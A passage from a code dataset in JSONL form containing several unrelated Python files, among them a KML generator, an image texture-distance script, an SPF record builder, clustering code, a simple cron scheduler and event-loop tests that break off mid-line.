output_kml_file[:doti] + '.lnk' + output_kml_file[doti:]\n netdoc.save(output_netlink_file)\n print(output_netlink_file, '...done!')\n except KeyError: pass\n except Exception as e: print('make netlink:',type(e),e)\n\n\n## SCRIPT ##\nHELP_TEXT = \"\"\"This script generates one or more OOI CGSN KML files.\n\nArg1: a .ini configuration file\nArg2: (optional) the path to save the file(s) to. If not specified, prints kml to STDOUT\n if Arg2 finishes with .kml or .kmz, the 'file_name' options from the ini file will be ignored.\nBy default, the generated KML file bear the name the input ini file.\nIf the config file specifies a 'file_name', then that will be used instead.\nEach section may specify their own file_name and in such case a new file will be generated for the given section.\nIf 'netlink' is assigned a url in the ini file, a similarly named NetworkLink file will also be created.\n\nSee 'example.ini' for an example ini file.\n\"\"\"\nif __name__ == '__main__':\n\n try:\n input_config_file = sys.argv[1]\n if sys.argv[1] in ['-h', '--help']:\n print(HELP_TEXT)\n sys.exit()\n except: print(HELP_TEXT); sys.exit()\n\n try: output_path = sys.argv[2]\n except: output_path = 'output'\n\n configs = read_config(input_config_file)\n\n if output_path.endswith('.kml') or output_path.endswith('.kmz'):\n config = list(configs.values())[0]\n main( config, output_path )\n else:\n for output_file,config in configs.items():\n output_file = os.path.join(output_path,output_file)\n main( config, output_file )\n \n \n","sub_path":"GE_factory.py","file_name":"GE_factory.py","file_ext":"py","file_size_in_byte":22594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"126443544","text":"#!/usr/bin/env python3\n# code partially taken from https://github.com/waleedgondal/Texture-based-Super-Resolution-Network\n\nimport os\nimport argparse\n\nimport torch\nimport torch.nn as nn\nimport torchvision\nfrom torchvision.transforms import ToTensor\nfrom torchvision.models import vgg19\n\nclass VGG(nn.Module):\n\n def __init__(self, layers=(0)):\n super(VGG, self).__init__()\n self.layers = layers\n self.model = vgg19(pretrained=True).features\n for param in self.model.parameters():\n param.requires_grad = False\n\n def forward(self, x):\n features = []\n for name, layer in enumerate(self.model):\n x = layer(x)\n if name in self.layers:\n features.append(x)\n if len(features) == len(self.layers):\n break\n return features\n\ndef distance(im1, im2, cuda=False):\n vgg_layers = [int(i) for i in opt.texture_layers]\n vgg_texture = VGG(layers=vgg_layers)\n if cuda:\n vgg_texture = vgg_texture.cuda()\n\n def gram_matrix(y):\n (b, ch, h, w) = y.size()\n features = y.view(b, ch, w * h)\n features_t = features.transpose(1, 2)\n gram = features.bmm(features_t) / ch\n return gram\n\n def criterion(a, b):\n return torch.mean(torch.abs((a-b)**2).view(-1))\n\n text_loss = []\n vgg1 = vgg_texture.forward(im1)\n vgg2 = vgg_texture.forward(im2)\n gram1 = [gram_matrix(y) for y in vgg1]\n gram2 = [gram_matrix(y) for y in vgg2]\n\n for m in range(0, len(vgg1)):\n text_loss += [criterion(gram1[m], gram2[m])]\n\n loss = torch.log(sum(text_loss))\n return loss.item()\n\ndef load_img(filepath):\n from PIL import Image\n img = Image.open(filepath).convert('RGB')\n return torch.stack([ToTensor()(img)])\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('im1')\n parser.add_argument('im2')\n parser.add_argument('--texture_layers', nargs='+', default=['8','17','26','35'], help='vgg layers for texture. Default:[]')\n parser.add_argument('--cuda', type=int, default=0, help='Try to use cuda? Default=1')\n opt = parser.parse_args()\n\n cuda = False\n if opt.cuda:\n if torch.cuda.is_available():\n cuda = True\n torch.cuda.manual_seed(opt.seed)\n else:\n cuda = False\n print('===> Warning: failed to load CUDA, running on CPU!')\n\n im1 = load_img(opt.im1)\n im2 = load_img(opt.im2)\n print(distance(im1, im2))\n\n","sub_path":"compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"608759524","text":"from .record import Record\n\nclass SPF(Record):\n\n def __init__(self, *args, **kwargs):\n self.default = kwargs.pop('default', None)\n kwargs['type'] = 'TXT'\n super(SPF, self).__init__(*args, **kwargs)\n self.data = list(self.data)\n\n def add(self, type, spec=None, action=''):\n if type not in ('all', 'include', 'a', 'mx', 'ptr', 'ip4', 'ip6', 'exists'):\n raise ValueError('Bad SPF type.')\n if action not in ('', '+', '-', '?', '~'):\n raise ValueError('Bad SPF action.')\n if spec:\n self.data.append('%s%s:%s' % (action, type, spec))\n else:\n self.data.append('%s%s' % (action, type))\n\n def dumps(self):\n\n if not (self.data or self.default):\n return ''\n\n parts = ['v=spf1']\n parts.extend(self.data)\n if self.default:\n parts.append('%sall' % self.default)\n\n return super(SPF, self).dumps(data=[' '.join(parts)])\n\n","sub_path":"zones/spf.py","file_name":"spf.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"14171902","text":"\"\"\"\nStack implemented with a resizing List\n\"\"\"\nfrom .stack import Stack\n\nclass StackWithList(Stack):\n def __init__(self):\n \"\"\"\n Using a pre-initilized List to store the items in the Stack in order to illistrate the resizing logic\n \"\"\"\n super(StackWithList, self).__init__()\n self._items = [None]\n\n def __iter__(self):\n return iter(reversed(filter(None, self._items[:self.size])))\n\n def _do_push(self, item):\n self._resize_if_nessisary()\n self._items.insert(self.size, item)\n self._size += 1\n\n def _do_pop(self):\n top_index = self.size - 1\n item = self._items[top_index]\n self._items[top_index] = None\n\n self._size -= 1\n self._resize_if_nessisary()\n return item\n\n def _get_top(self):\n return self._items[self.size - 1]\n\n def _resize_if_nessisary(self):\n max_items = len(self._items)\n\n if self.size == max_items:\n resize_factor = .5\n elif self.size == (max_items / 4):\n resize_factor = 2\n else:\n return\n\n new_items = [None] * int(max_items * resize_factor)\n\n for index in range(self.size):\n new_items[index] = self._items[index]\n\n self._items = new_items\n","sub_path":"src/data_structures/stack/stack_list.py","file_name":"stack_list.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"460493650","text":"import numpy as np\nfrom numpy import exp, log\nfrom functools import partial\nfrom scipy.special import gamma, gammaln\nfrom scipy.cluster.hierarchy import dendrogram\nimport matplotlib.pyplot as plt\n\ndef bhclust(dat, family, alpha, r = 0.001):\n \"\"\"Return a matrix in the format of linkage matrix for dendrogram\n @dat: N records of data with k columns\n @family: function to specify distribution for data. {\"multivariate\", \"bernoulli\"}\n @alpha: hyperparameter for the prior\n @r: scaling factor on the prior precision of the mean\n \"\"\"\n N, k = dat.shape\n la = log(alpha)\n\n if family == \"multivariate\":\n m = np.mean(dat, axis=0).reshape(k, 1)\n S = np.cov(dat.T)/10 # precision?\n def mlfunc(X):\n return niw(X, m, S, r)\n\n elif family == \"bernoulli\":\n #r=0.01\n m = np.mean(np.vstack((dat, np.ones(k)*r, np.zeros(k))), axis=0)\n alp= m*2; beta=(1-m)*2\n mlfunc = partial(bb, alp=alp, beta=beta)\n\n # leaf nodes\n SS = list(range(N))\n x0 = []; d0 = [la] * N\n ml = []\n for l in range(N):\n x0.append((l,))\n ml.append(mlfunc(dat[l,].reshape(1,k)))\n\n # paired base cases\n t = 0; PP = []\n c1 = []; c2 = []\n x = []; d = []\n lp1 = []; lp2 = []; lodds = []\n for i in range(N-1):\n for j in range(i+1, N):\n c1.append(i); c2.append(j)\n x.append(x0[i]+x0[j])\n u = la + gammaln(len(x[t]))\n v = d0[i] + d0[j]\n d.append((u + log(1 + exp(v - u))))\n lp1.append(mlfunc(dat[x[t],:]) + la + gammaln(len(x[t])) - d[t])\n lp2.append(ml[i] + ml[j] + d0[i] + d0[j] - d[t])\n lodds.append(lp1[t] - lp2[t])\n PP.append(t); t = t + 1\n\n # build tree, Z = [leaf1, leaf2, weight, #leaves]\n p = 0\n Z = []\n dye = {}\n while(1):\n idx = lodds.index(max([lodds[y] for y in PP]))\n Z.append([c1[idx], c2[idx], 1/lodds[idx], len(x[idx])])\n if lodds[idx] < 0:\n dye[N + p] = \"#FF0000\"\n else:\n dye[N + p] = \"#0013FF\"\n\n x0.append(x[idx]); d0.append(d[idx]); ml.append(lp1[idx] + log(1+exp(lp2[idx] - lp1[idx])))\n rm = set(Z[p][:2])\n SS = [y for y in SS if y not in rm]\n if len(SS) == 0:\n break\n\n for q in SS:\n c1.append(N+p); c2.append(q)\n x.append(x0[N+p] + x0[q])\n\n u = la + gammaln(len(x[t]))\n v = d0[N+p] + d0[q]\n d.append((u + log(1 + exp(v - u))))\n lp1.append(mlfunc(dat[x[t],:]) + la + gammaln(len(x[t])) - d[t])\n lp2.append(ml[N+p] + ml[q] + d0[N+p] + d0[q] - d[t])\n lodds.append(lp1[t] - lp2[t])\n PP.append(t); t = t + 1\n\n PP = [y for y in PP if c1[y] not in rm and c2[y] not in rm]\n SS.append(N + p); p = p + 1\n\n Z_ = weighted(Z, N)\n\n return Z_, dye\n\n\ndef weighted(Z, N):\n mw = max([y[2] for y in Z])\n for i in range(len(Z)):\n if Z[i][2] < 0:\n Z[i][2] = 2 * mw\n if Z[i][0] > (N - 1):\n Z[i][2] += Z[Z[i][0] - N][2]\n if Z[i][1] > (N - 1):\n Z[i][2] += Z[Z[i][1] - N][2]\n return Z\n\n\ndef scale_matrix(X, N, k, r, m, S):\n \"\"\"Return scale matrix for the inverse-Wishart distribution on Sigma.\n @X: N records of data with k columns\n @m: prior on the mean, k * 1\n @S: prior on the covariance, k * k\n \"\"\"\n\n xsum = np.sum(X, axis = 0).reshape(k,1) # column sum\n t1 = X.T @ X\n t2 = r * N / (N + r) * (m @ m.T)\n t3 = 1/(N+r) * (xsum @ xsum.T)\n t4 = (r / (N + r)) * (m @ xsum.T + xsum @ m.T)\n\n Sprime = S + t1 + t2 - t3 - t4\n\n return Sprime\n\n\ndef niw(X, m, S, r):\n \"\"\"Return marginal likelihood for multivariate normal data using the conjugate prior distribution normal-inverse-Wishart\n @X: N records of data with k columns\n @m: prior on the mean, k * 1\n @S: prior on the covariance, k * k\n @r: scaling factor on the prior precision of the mean\n \"\"\"\n\n N, k = X.shape\n v = k\n vprime = v + N\n Sprime = scale_matrix(X, N, k, r, m, S)\n\n t1 = (2 * np.pi) ** (- N * k / 2)\n t2 = (r / (N + r)) ** (k/2)\n t3 = np.linalg.det(S) ** (v/2)\n t4 = np.linalg.det(Sprime) ** (-vprime/2)\n t5num = np.prod(gamma( (vprime - np.arange(k))/2 ) ) * (2 ** (vprime * k / 2))\n t5den = np.prod(gamma( (v - np.arange(k))/2 ) ) * (2 ** (v * k / 2))\n\n ml = t1 * t2 * t3 * t4 * (t5num/t5den)\n\n return np.log(ml)\n\ndef bb(X, alp=0.001, beta=0.01):\n \"\"\"Return marginal likelihood for bernoulli data using the conjugate prior distribution Bernoulli-Beta\n @X: N records of data with k columns\n @alpha, beta: hyperparmeter for Beta distribution\n \"\"\"\n md = np.sum(X,axis=0)\n N = X.shape[0]\n num = gammaln(alp+beta) + gammaln(alp+md) + gammaln(beta+N-md)\n den = gammaln(alp) + gammaln(beta) + gammaln(alp+beta+N)\n return np.sum(num - den)\n\n#No consider mean relates to alphas\ndef bhclust_BB(X, alpha = 0.001):\n \"\"\"Calculate P(Dk|Tk)\n Return linkage_matrix\n \"\"\"\n linkage_list = []\n linkage_list_out = []\n nk = 2\n maximum = 0.01\n dim = X.copy().shape[0]\n merge_dim = X.shape[0]\n obs_list = [i for i in range(1,dim+1)]\n dye = {}\n while (nk < dim and maximum !=0):\n maximum = 0\n for i in obs_list:\n for j in obs_list:\n if (j>i):\n if (i<=dim and j<=dim):\n s, w = i-1, j-1\n nk = 2\n prob_DTi, prob_DTj = prob_DH1(X[s]), prob_DH1(X[w])\n di, dj = alpha, alpha\n elif (i<=dim and j>dim):\n s = i-1\n w = np.array(linkage_list[j-dim-1][:2]) - 1\n nk = linkage_list[j-dim-1][3] + 1\n prob_DTi, prob_DTj = prob_DH1(X[s]), linkage_list[j-dim-1][4]\n di, dj = alpha, linkage_list[j-dim-1][5]\n elif (i>dim and j>dim):\n s = np.array(linkage_list[i-dim-1][:2])-1\n w = np.array(linkage_list[j-dim-1][:2])-1\n nk = linkage_list[i-dim-1][3] + linkage_list[j-dim-1][3]\n prob_DTi, prob_DTj = linkage_list[i-dim-1][4], linkage_list[j-dim-1][4]\n di, dj = linkage_list[i-dim-1][5], linkage_list[j-dim-1][5]\n\n Dk_tmp = np.vstack((X[s],X[w]))\n\n dk = alpha*gamma(nk)+di*dj\n\n pik = alpha*gamma(nk)/dk\n prob_DT = prob_DH1(Dk_tmp)*pik + prob_DTi * prob_DTj * di * dj / dk\n\n rk = pik*prob_DH1(Dk_tmp)/prob_DT\n if (rk > maximum):\n maximum = rk\n merge_i = i\n merge_j = j\n merge_prob_DTi = prob_DT.copy()\n merge_Dk = Dk_tmp.copy()\n merge_dk = dk\n if (maximum ==0):\n break\n if (maximum > 0.5):\n dye[merge_dim] = \"#0013FF\"\n else:\n dye[merge_dim] = \"#FF0000\"\n merge_dim+=1\n obs_list.append(merge_dim)\n\n if (merge_i) in obs_list: obs_list.remove(merge_i) #remove merged observations' idx from list\n if (merge_j) in obs_list: obs_list.remove(merge_j)\n\n X = np.vstack((X,merge_Dk))\n nk = merge_Dk.shape[0]\n linkage_list.append([merge_i, merge_j, np.log(maximum/(1-maximum)), nk, merge_prob_DTi, merge_dk])\n linkage_list_out.append([merge_i-1, merge_j-1, np.log(maximum/(1-maximum)), nk])\n\n return (linkage_list_out, dye)\n\ndef prob_DH1(X, alpha=0.8, beta=0.2):\n \"\"\"Return marginal likelihood for bernoulli data using the conjugate prior distribution Bernoulli-Beta\n @X: N records of data with k columns\n @alpha, beta: hyperparmeter for Beta distribution\n \"\"\"\n md = np.sum(X,axis=0)\n N = X.shape[0]\n nominator = np.array(gamma(alpha+beta)*gamma(alpha+md))*np.array(gamma(beta+N-md))\n denominator = gamma(alpha)*gamma(beta)*gamma(alpha+beta+N)\n return np.prod(nominator/denominator)\n\ndef bb_draw(X_test):\n ttt, colorb = bhclust_BB(X=X_test)\n N = X_test.shape[0]\n Z1 = np.array(ttt)\n Z1[:,2] = 1/Z1[:,2]\n maxw = max(Z1[:,2])\n Z1[Z1[:,2] < 0,2] = 2*maxw\n for i in range(Z1.shape[0]):\n if Z1[i, 0] > (N-1):\n Z1[i, 2] += Z1[Z1[i, 0].astype(\"int\")-N, 2]\n if Z1[i,1] > (N-1):\n Z1[i,2] += Z1[Z1[i,1].astype(\"int\")-N, 2]\n\n dendrogram(Z1,link_color_func=lambda k: colorb[k])\n plt.show()\n","sub_path":"bhc/bhc.py","file_name":"bhc.py","file_ext":"py","file_size_in_byte":8642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"649207854","text":"import os\nfrom datetime import datetime\nimport time\nfrom crontab import CronTab\nfrom croniter import croniter\nimport logging\n\n\ndef child(command):\n os.system(command)\n os._exit(0)\n\n\ndef parent():\n base = datetime(datetime.now().year, datetime.now().month, datetime.now().day, datetime.now().hour,\n datetime.now().minute)\n\n logging.basicConfig(filename='logi.log', filemode='w', level=logging.DEBUG,\n format='%(asctime)s:%(name)s:%(levelname)s: %(message)s',\n )\n\n word_list=[]\n time_list = []\n iter_list = []\n counters =[]\n logging.info(\"Start file processing\")\n cron = CronTab(tabfile='task.tab')\n for word in cron:\n str_word =str(word)\n if str_word[:1] == '#':\n continue\n word_list.append(str_word)\n\n for i in range(len(word_list)):\n count=0\n for j in word_list[i]:\n if j.isalpha():\n if word_list[i][count-1:count] == '/':\n count-=1\n counters.append(count)\n break\n count+=1\n iter = croniter(word_list[i][:count], base)\n iter_list.append(iter)\n\n for j in range(len(word_list)):\n compare_time = iter_list[j].get_next(datetime)\n time_list.append(compare_time)\n\n logging.info(\"File processing is done\")\n logging.info(\"Read job(s): '{}'\".format(len(word_list)))\n size = len(word_list)\n while True:\n\n i=0\n for i in range(size):\n if time_list[i] == datetime(datetime.now().year, datetime.now().month, datetime.now().day, datetime.now().hour,datetime.now().minute):\n time_list[i] = iter_list[i].get_next(datetime)\n logging.info(\"Starting process command: '{}'\".format((word_list[i][counters[i]:])))\n pid = os.fork()\n if pid == 0:\n\n try:\n child(word_list[i][counters[i]:])\n except Exception as e:\n logging.error(e)\n logging.info(\"Finish process\")\n \n time.sleep(1)\n\nparent()\n\n\n\n\n\n\n\n","sub_path":"cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"360272728","text":"def solution(N, A):\r\n result = [0]*N\r\n max_counter = 0\r\n current_max = 0\r\n \r\n for command in A:\r\n if 1 <= command <= N:\r\n if max_counter > result[command-1]:\r\n result[command-1] = max_counter\r\n result[command-1] += 1\r\n if current_max < result[command-1]:\r\n current_max = result[command-1]\r\n else:\r\n max_counter = current_max\r\n \r\n for index in range(0,N):\r\n if result[index] < max_counter:\r\n result[index] = max_counter\r\n \r\n return result\r\n\r\ndef solution1(N, A):\r\n B = [0] * N\r\n count = 0\r\n last = 0\r\n \r\n for i in xrange(len(A)):\r\n if (A[i] > N):\r\n last = count\r\n else:\r\n B[A[i] - 1] = max(B[A[i] - 1], last) + 1\r\n count = max(count, B[A[i] - 1])\r\n \r\n for i in xrange(len(B)):\r\n B[i] = max(B[i], last)\r\n return B","sub_path":"codility/MaxCounters.py","file_name":"MaxCounters.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"270015030","text":"\"\"\"\n判断输入的正整数是不是回文数\n回文数是指将一个正整数从左往右排列和从右往左排列值一样的数\n\"\"\"\n\nnum = int(input(\"请输入数字:\"))\nreversedNum = 0\ntemp = num\n\nwhile temp > 0:\n # 取最低位数字 + 回文数\n reversedNum = reversedNum * 10 + temp % 10\n # 临时数取整\n temp = temp // 10\n\nprint(\"输入数字为%d, 反转后数字为 %d 。\" % (num, reversedNum))\nif reversedNum == num :\n print(\"%d 是回文数\" % num) \nelse:\n print(\"%d 不是回文数\" % num) \n","sub_path":"day05/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"643702762","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n#The MIT License (MIT)\n#\n#Copyright (c) <2013-2014> \n#\n#Permission is hereby granted, free of charge, to any person obtaining a copy\n#of this software and associated documentation files (the \"Software\"), to deal\n#in the Software without restriction, including without limitation the rights\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n#copies of the Software, and to permit persons to whom the Software is\n#furnished to do so, subject to the following conditions:\n#\n#The above copyright notice and this permission notice shall be included in\n#all copies or substantial portions of the Software.\n#\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n#THE SOFTWARE.\n#\n\"\"\" Contains the automatic generic indenter \"\"\"\nimport re\nfrom pyqode.core.mode import Mode\nfrom pyqode.qt.QtCore import Qt\nfrom pyqode.qt.QtGui import QTextCursor, QKeyEvent\n\n\nclass AutoIndentMode(Mode):\n \"\"\"\n Generic indenter mode that indents the text when the user press RETURN.\n\n You can customize this mode by overriding\n :meth:`pyqode.core.AutoIndentMode._getIndent`\n \"\"\"\n #: Identifier\n IDENTIFIER = \"autoIndentMode\"\n #: Description\n DESCRIPTION = \"\"\" A basic auto indent mode that provides a basic auto\n indentation based on the previous line indentation.\n \"\"\"\n\n def __init__(self):\n super(AutoIndentMode, self).__init__()\n self.minIndent = \"\"\n\n def _getIndent(self, tc):\n \"\"\"\n Return the indentation text (a series of spaces or tabs)\n\n :param tc: QTextCursor\n\n :returns: Tuple (text before new line, text after new line)\n \"\"\"\n pos = tc.position()\n # tc.movePosition(QTextCursor.StartOfLine)\n # tc.setPosition(tc.position() - 1)\n tc.movePosition(QTextCursor.StartOfLine)\n tc.select(QTextCursor.LineUnderCursor)\n s = tc.selectedText()\n indent = re.match(r\"\\s*\", s).group()\n tc.setPosition(pos)\n if len(indent) < len(self.minIndent):\n indent = self.minIndent\n return \"\", indent\n\n def _onStateChanged(self, state):\n if state is True:\n self.editor.keyPressed.connect(self.__onKeyPressed)\n else:\n self.editor.postKeyPressed.disconnect(self.__onKeyPressed)\n\n def __onKeyPressed(self, keyEvent):\n \"\"\"\n Auto indent if the released key is the return key.\n :param keyEvent: the key event\n \"\"\"\n if keyEvent.isAccepted():\n return\n if keyEvent.key() == Qt.Key_Return or keyEvent.key() == Qt.Key_Enter:\n tc = self.editor.textCursor()\n pre, post = self._getIndent(tc)\n tc.insertText(\"%s\\n%s\" % (pre, post))\n\n # eats possible whitespaces\n tc.movePosition(tc.WordRight, tc.KeepAnchor)\n txt = tc.selectedText()\n if txt.startswith(' '):\n new_txt = txt.replace(\" \", '')\n if len(txt) > len(new_txt):\n tc.insertText(new_txt)\n\n keyEvent.accept()\n","sub_path":"pyqode/core/modes/autoindent.py","file_name":"autoindent.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"63483312","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 28 22:28:50 2021\n\n@author: admin\n\"\"\"\n\ndef take_square(num1, num2):\n dictionary = dict()\n \n for i in range(num1, num2+1):\n if i % 2 != 0:\n dictionary[i] = i ** 2\n \n return dictionary\n\ntake_square(1, 20)","sub_path":"projects/Square.py","file_name":"Square.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"427458550","text":"#Embedded file name: dogma/attributes\\utils.py\n\"\"\"\n Utility functions for dogma attributes.\n\"\"\"\nimport dogma.attributes\n\ndef GetAttributeValuesByCategoryNames(dbdogma, attributeList):\n \"\"\"\n Gets attributes by attributeCategory from the DB.\n :param dbdogma: dogma schema object from DB2\n :param attributeList: dict of key:attributeID and item:value\n :return attributesByCategories: dict with key:categoryName and item:dict with key:attributeID and item:value.\n \"\"\"\n categories = dbdogma.AttributeCategories_Select().Index('categoryID')\n attributesByCategories = {}\n for attributeID, value in attributeList.iteritems():\n attribute = dogma.attributes.GetAttribute(attributeID)\n categoryName = categories[attribute.categoryID].categoryName\n if categoryName not in attributesByCategories:\n attributesByCategories[categoryName] = []\n attributesByCategories[categoryName].append((attributeID, attribute.attributeName, value))\n\n for category, attributes in attributesByCategories.iteritems():\n attributesByCategories[category] = sorted(attributes, key=lambda x: x[1])\n\n return attributesByCategories\n\n\ndef GetDisplayNamesForAttributeList(attributeList):\n \"\"\"\n Gets display names for a list (or dict) of attributes.\n If no display name exists it gets the default name.\n :param attributeList: list or dict containing attributes\n :return attributeNames: list of names\n \"\"\"\n attributeNames = []\n for attribute in attributeList:\n name = dogma.attributes.GetDisplayName(attribute)\n attributeNames.append(name)\n\n return attributeNames\n","sub_path":"dogma/attributes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"20080054","text":"import contextlib\nimport gc\nimport os\nimport signal\nfrom unittest.mock import DEFAULT, MagicMock, Mock, call, patch\n\nimport pytest\n\nimport aio\nimport aio.loop._priv\nfrom aio.interfaces import Clock, Handle, LoopPolicy, LoopStopped\nfrom aio.loop.pure import BaseEventLoop, BaseLoopRunner\nfrom aio.loop.pure.scheduler import Scheduler\nfrom tests.utils import mock_wraps\n\n\ndef process_callback_exception(exc, **__) -> None:\n if isinstance(exc, AssertionError):\n raise exc\n\n import traceback\n\n traceback.print_exception(type(exc), exc, exc.__traceback__)\n pytest.fail(\"No unhandled exceptions is allowed inside callbacks during testing\")\n\n\n@pytest.fixture\ndef clock():\n clock = MagicMock(Clock, name=\"clock\")\n clock.now.return_value = 50.0\n clock.resolution.return_value = 0.1\n return clock\n\n\n@pytest.fixture\ndef selector(clock):\n selector = Mock(name=\"selector\")\n\n def selector_select(time_):\n if time_ is None:\n return []\n clock.now.return_value += time_\n return []\n\n selector.select = Mock(wraps=selector_select)\n return selector\n\n\n@pytest.fixture\ndef loop_policy(selector, clock):\n @contextlib.contextmanager\n def create_loop():\n yield BaseEventLoop(selector, clock=clock)\n\n policy = Mock(LoopPolicy)\n policy.create_loop = create_loop\n policy.create_loop_runner = lambda loop: BaseLoopRunner(loop)\n policy.create_networking.side_effect = RuntimeError(\"Forbidden\")\n policy.create_executor.side_effect = RuntimeError(\"Forbidden\")\n\n with patch.object(aio.loop._priv.loop_global_cfg, \"policy\", policy, create=True):\n yield policy\n\n\nclass TestLoopStepping:\n @pytest.fixture\n def make_loop(self, selector, clock):\n return lambda scheduler: BaseEventLoop(\n selector,\n clock=clock,\n scheduler=scheduler,\n exception_handler=process_callback_exception,\n )\n\n def test_runs_io_callbacks(self, selector, make_loop):\n # TODO\n pass\n\n def test_runs_only_expired_cbs(self, clock, selector, make_loop):\n parent_cb = Mock()\n cb0 = parent_cb.cb0\n cb1 = parent_cb.cb1\n scheduler = Scheduler([], [Handle(55.0, cb0), Handle(60.0, cb1)])\n\n make_loop(scheduler).run_step()\n\n assert selector.mock_calls == [call.select(5.0)]\n assert scheduler.get_items() == [Handle(60.0, cb1)]\n assert parent_cb.mock_calls == [\n call.cb0(),\n ]\n assert clock.now() == 55.0\n\n def test_dont_runs_pending_if_cancelled(self, clock, selector, make_loop):\n parent_cb = Mock()\n cb1 = parent_cb.cb1\n cb2 = parent_cb.cb2\n handle1 = Handle(None, cb1, cancelled=True)\n handle2 = Handle(60.0, cb2)\n scheduler = Scheduler([handle1], [handle2])\n\n make_loop(scheduler).run_step()\n\n assert selector.mock_calls == [call.select(10.0)]\n assert scheduler.get_items() == []\n assert parent_cb.mock_calls == [\n call.cb2(),\n ]\n assert clock.now() == 60.0\n\n def test_dont_runs_enqueued_if_cancelled(self, clock, selector, make_loop):\n parent_cb = Mock()\n cb1 = parent_cb.cb1\n cb2 = parent_cb.cb2\n handle1 = Handle(55.0, cb1, cancelled=True)\n handle2 = Handle(60.0, cb2)\n scheduler = Scheduler([], [handle1, handle2])\n\n make_loop(scheduler).run_step()\n\n assert selector.mock_calls == [call.select(10.0)]\n assert scheduler.get_items() == []\n assert parent_cb.mock_calls == [\n call.cb2(),\n ]\n assert clock.now() == 60.0\n\n def test_dont_runs_pending_if_cancelled_during_select(self, clock, selector, make_loop):\n parent_cb = Mock()\n cb1 = parent_cb.cb1\n cb2 = parent_cb.cb2\n handle1 = Handle(55.0, cb1)\n handle2 = Handle(60.0, cb2)\n scheduler = Scheduler([], [handle1, handle2])\n selector.select.side_effect = (\n # returning DEFAULT force mock to proceed to call 'wraps' object\n lambda *_: (handle1.cancel() or DEFAULT)\n )\n\n make_loop(scheduler).run_step()\n\n assert selector.mock_calls == [call.select(5.0)]\n assert scheduler.get_items() == [handle2]\n assert parent_cb.mock_calls == []\n assert clock.now() == 55.0\n\n @pytest.mark.parametrize(\"same_time_events_count\", [2, 3, 4, 5])\n def test_runs_only_expired_cbs_have_same_time_events(\n self, clock, selector, make_loop, same_time_events_count\n ):\n parent_cb = Mock()\n cbs = [getattr(parent_cb, f\"cb{i}\") for i in range(same_time_events_count)]\n last_cb = parent_cb.cb2\n scheduler = Scheduler([], [Handle(55.0, cb) for cb in cbs] + [Handle(60.0, last_cb)])\n\n make_loop(scheduler).run_step()\n\n assert scheduler.get_items() == [Handle(60.0, last_cb)]\n assert parent_cb.mock_calls == [\n getattr(call, f\"cb{i}\")() for i in range(same_time_events_count)\n ]\n assert selector.mock_calls == [call.select(5.0)]\n assert clock.now() == 55.0\n\n def test_runs_only_expired_cbs2(self, clock, selector, make_loop):\n parent_cb = Mock()\n cb0 = parent_cb.cb0\n cb1 = parent_cb.cb1\n scheduler = Scheduler([], [Handle(55.0, cb0), Handle(60.0, cb1)])\n loop = make_loop(scheduler)\n\n loop.run_step()\n assert selector.mock_calls == [call.select(5.0)]\n assert clock.now() == 55.0\n assert parent_cb.mock_calls == [\n call.cb0(),\n ]\n\n loop.run_step()\n assert scheduler.get_items() == []\n assert parent_cb.mock_calls == [\n call.cb0(),\n call.cb1(),\n ]\n assert selector.mock_calls == [call.select(5.0), call.select(5.0)]\n assert clock.now() == 60.0\n\n def test_runs_only_expired_cbs3(self, clock, selector, make_loop):\n parent_cb = Mock()\n cb0 = parent_cb.cb0\n cb1 = parent_cb.cb1\n cb2 = parent_cb.cb2\n scheduler = Scheduler([], [Handle(55.0, cb0), Handle(60.0, cb1), Handle(65.0, cb2)])\n loop = make_loop(scheduler)\n\n for i in range(3):\n loop.run_step()\n\n assert scheduler.get_items() == []\n assert parent_cb.mock_calls == [\n call.cb0(),\n call.cb1(),\n call.cb2(),\n ]\n assert selector.mock_calls == [\n call.select(5.0),\n call.select(5.0),\n call.select(5.0),\n ]\n assert clock.now() == 65.0\n\n def test_runs_pending_cbs_immediately(self, clock, selector, make_loop):\n parent_cb = Mock()\n cb0 = parent_cb.cb0\n cb1 = parent_cb.cb1\n scheduler = Scheduler([Handle(None, cb0), Handle(None, cb1)])\n loop = 